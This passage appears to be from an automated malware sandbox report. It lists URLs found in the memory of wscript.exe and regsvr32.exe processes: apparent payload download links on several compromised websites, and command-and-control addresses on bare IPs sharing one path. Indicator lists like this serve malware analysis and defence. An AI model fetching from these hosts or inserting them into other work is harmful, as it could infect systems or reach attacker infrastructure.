                  Source: regsvr32.exe, 0000000F.00000003.452510983.0000000002887000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000003.453274257.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Q
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: regsvr32.exe, 0000000F.00000002.572181479.000000000073C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
                  Source: wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389268464.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394733751.00000000058D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://efirma.sg
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://efirma.sglwebs.com/img/2mmLuv
                  Source: wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/
                  Source: wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/8
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hypernite.5v.pl/vendo
                  Source: wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/
                  Source: wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/cw1122
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/zM
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malli.s4
                  Source: wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392433354.0000000003324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malli.su:80/img/PXN5J/
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://malli.su:80/img/PXN5J/tM
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://semedacara.com.br/ava/a
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380726054.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381071407.0000000005518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380565209.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384344893.000000000569B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.0000000005498000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385194824.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393045342.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385805896.000000000575C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.378645005.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://semedacara.com.br/ava/ahhz/
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://semedacara.com.br/ava/ahhz/yM
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staging-demo.com/public_html/wT
                  Source: wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staging-demo.com/public_html/wTG/
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://staging-demo.com/public_html/wTG/xM
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uk-eurodom.co
                  Source: wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uk-eurodom.com/bitrix/9HrzPY66D1F/
                  Source: wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381439650.000000000557E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.000000000558C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394341142.000000000558C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uk-eurodom.com/bitrix/9HrzPY66D1F/24Q
                  Source: wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382444301.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386310650.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382820492.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394355887.00000000055AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383863308.00000000055A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.polarkh-crewing.com/aboutu
                  Source: wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.polarkh-crewing.com/aboutus/EUzMzX7yXpP/
                  Source: wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.polarkh-crewing.com/aboutus/EUzMzX7yXpP/69ou
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/l
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/0
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/rw
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.197.14.67:8080/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.0000000000762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/a
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://193.194.92.175/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.000000000073C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://198.38.121.17/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/tcbvserkm/kigv/rbwmds/
                  Source: regsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/tcbvserkm/kigv/rbwmds/T(
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/tcbvserkm/kigv/rbwmds/wn
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17:443/tcbvserkm/kigv/rbwmds/
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380726054.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381071407.0000000005518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380565209.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384344893.000000000569B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.0000000005498000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385194824.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393045342.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385805896.000000000575C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.378645005.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://4fly.su:443/search/OfGA/
                  Source: wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380055179.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379248511.0000000005397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394303780.00000000053A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://4fly.su:443/search/OfGA/ata
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://4fly.su:443/search/OfGA/wM
                  Source: regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://93.84.115.205:7080/T
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kts.group
                  Source: wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392433354.0000000003324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kts.group/35ccbf2003/jKgk8/
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kts.group/35ccbf2003/jKgk8/uM
